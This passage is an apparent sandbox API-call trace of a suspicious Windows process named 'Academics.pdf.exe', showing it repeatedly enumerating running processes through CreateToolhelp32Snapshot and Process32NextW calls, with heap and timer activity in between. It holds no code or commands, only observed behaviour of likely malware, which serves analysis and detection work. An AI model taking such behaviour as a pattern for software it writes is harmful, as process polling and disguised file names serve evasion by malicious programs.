th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.475] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0304.476] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.477] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.478] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.479] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.480] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.489] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.490] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.491] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.492] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.493] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.494] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.495] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.496] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.497] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.498] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.499] CloseHandle (hObject=0x294) returned 1 [0304.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.499] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.499] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.499] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 1 [0304.499] TranslateMessage (lpMsg=0x8bf970) returned 0 [0304.499] DispatchMessageW (lpMsg=0x8bf970) returned 0x0 [0304.500] KillTimer (hWnd=0x60122, uIDEvent=0x1) returned 1 [0304.500] SetTimer (hWnd=0x60122, nIDEvent=0x1, uElapse=0x2ee, lpTimerFunc=0x0) returned 0x1 [0304.500] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.500] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.500] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.500] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.500] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.502] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.503] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x51, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0304.504] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0304.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.505] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x17c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x140, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0304.506] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0304.507] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x174, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0304.508] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0304.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x17c, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0304.509] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x17c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0304.510] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.511] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.512] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.513] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x334, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.514] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0304.515] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.516] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.517] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0304.518] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1b, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0304.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0304.519] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0304.520] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.521] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0304.522] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="advised-cleaners-junction.exe")) returned 1 [0304.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="thy-transaction-css.exe")) returned 1 [0304.523] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x56c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="says_settlement.exe")) returned 1 [0304.524] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x774, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="katie.exe")) returned 1 [0304.525] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x688, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="choosing.exe")) returned 1 [0304.526] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pmc.exe")) returned 1 [0304.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sansruled.exe")) returned 1 [0304.527] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x508, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="platform.exe")) returned 1 [0304.528] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x40c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="student.exe")) returned 1 [0304.529] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="deployment.exe")) returned 1 [0304.530] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="close.exe")) returned 1 [0304.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x684, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reviewerbedrooms.exe")) returned 1 [0304.531] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="lb_indigenous_neighborhood.exe")) returned 1 [0304.532] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x288, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ghana-after.exe")) returned 1 [0304.533] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="perfect tries.exe")) returned 1 [0304.534] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x6f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="flexible.exe")) returned 1 [0304.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x738, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="secrets cas finding.exe")) returned 1 [0304.535] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="width cleared.exe")) returned 1 [0304.536] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x820, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.537] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x898, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.538] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x8f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0304.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x90c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0304.539] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xb0c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="Academics.pdf.exe")) returned 1 [0304.540] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0304.541] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 0 [0304.542] CloseHandle (hObject=0x294) returned 1 [0304.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa2e0 | out: hHeap=0x25c0000) returned 1 [0304.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa700 | out: hHeap=0x25c0000) returned 1 [0304.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x34aa598 | out: hHeap=0x25c0000) returned 1 [0304.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2058 | out: hHeap=0x25c0000) returned 1 [0304.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x38) returned 0x246d6e0 [0304.542] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.542] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x246d6e0 | out: hHeap=0x25c0000) returned 1 [0304.542] PeekMessageW (in: lpMsg=0x8bf970, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8bf970) returned 0 [0304.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2058 [0304.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa598 [0304.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa700 [0304.542] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x8) returned 0x24b2bb8 [0304.543] RtlAllocateHeap (HeapHandle=0x25c0000, Flags=0x0, Size=0x10) returned 0x34aa2e0 [0304.543] HeapFree (in: hHeap=0x25c0000, dwFlags=0x0, lpMem=0x24b2bb8 | out: hHeap=0x25c0000) returned 1 [0304.543] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x294 [0304.545] Process32FirstW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0304.546] Process32NextW (in: hSnapshot=0x294, lppe=0x8bf494 | out: lppe=0x8bf494*(dwSize=0x22c, cntUsage=0x0, 